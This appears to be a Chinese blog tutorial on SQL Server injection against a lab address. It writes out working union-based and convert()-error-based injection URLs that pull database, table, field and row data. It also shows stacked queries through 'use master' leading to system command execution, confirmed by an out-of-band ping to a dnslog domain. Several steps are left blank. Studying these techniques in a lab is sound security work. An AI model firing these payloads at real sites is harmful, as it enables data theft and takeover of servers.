sqlserver联合查询注入
第一步判断注入点:
在id=1的后面分别加入and 1=1,and 1=2 页面是否相同。
http://192.168.122.143/1.php?id=1%20and%201=1
http://192.168.122.143/1.php?id=1%20and%201=2
第二步,判断列数。利用order by
http://192.168.122.143/1.php?id=1%20order%20by%203
http://192.168.122.143/1.php?id=1%20order%20by%204
说明存在3列
第三步,查看显示位。
上面的步骤与sql注入基本相同 但显示位这里需要注意,如果用1,2,3这样的字符,需要用单引号勾选。或者用null来占位。
http://192.168.122.143/1.php?id=1%20union%20select%20null,null,null
第四部,查看数据库名
http://192.168.122.143/1.php?id=-1%20union%20select%20null,db_name(),null
这里需要让ID等于一个没有的值,取消占位
第五步,查询表名
这里的查询语句也要与mysql区分。需要加上from 这个数据库.sys.sysobjects where xtype=‘U’这样的格式
第六步,查询字段名
同样加入from,不过因为显示的原因要在select的后面加上限制只显示一行。用TOP 1 来限制。这样就可以查询出一个字段名,需要查询其他的字段名,需要在最后面加上name不等于刚才查询的字段,这样就会出现下一个字段名,一直加不等于,知道页面报错,说明查询完毕。
没有结果说明字段查询结束
第七步,查询数据
沿用第六步的方式,一个一个的查询出数据。
http://192.168.122.143/1.php?id=-1%20union%20select%20TOP%201%20null,name,age%20from%20users
sqlserver报错注入
sqlserver在语句执行错误的时候 会报错 并且会在网页上显示出来。
利用mssql在转换类型的时候就出错时 会显示系统信息。
报错注入的步骤大体与联合查询注入相似,也是要用不等于这样的方式查出想要的数据。不过报错注入,需要一个函数来让他报错,且能爆出数据,这个函数就是convent
把查询语句转换成int类型,使其出错,但又能爆出数据。
爆出数据库名:http://192.168.122.143/1.php?id=1%20and%201=convert(int,(select%20top%201%20db_name()))
爆出列名:
爆出数据:
....................
sqlserver执行系统命令
先前段sql语句,在后面执行命令语句
http://192.168.122.143/1.php?id=1;
进入use master
http://192.168.122.143/1.php?id=1;use%20master;
开启功能
执行成功
接下来开始执行系统语句,因为我们并不能页面上看到我们执行的系统命令是否成功,所以需要dnslog这个网站来测试ping命令
去dnslog上获取一个域名:q5c5gp.dnslog.cn
然后开始执行ping命令
这时我们可以明显的感觉页面的返回慢了一些,我们去dnslog上查看
有数据,说明我们成功的执行了ping命令,现在我们就可以随意的执行其他的系统命令了
3543
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
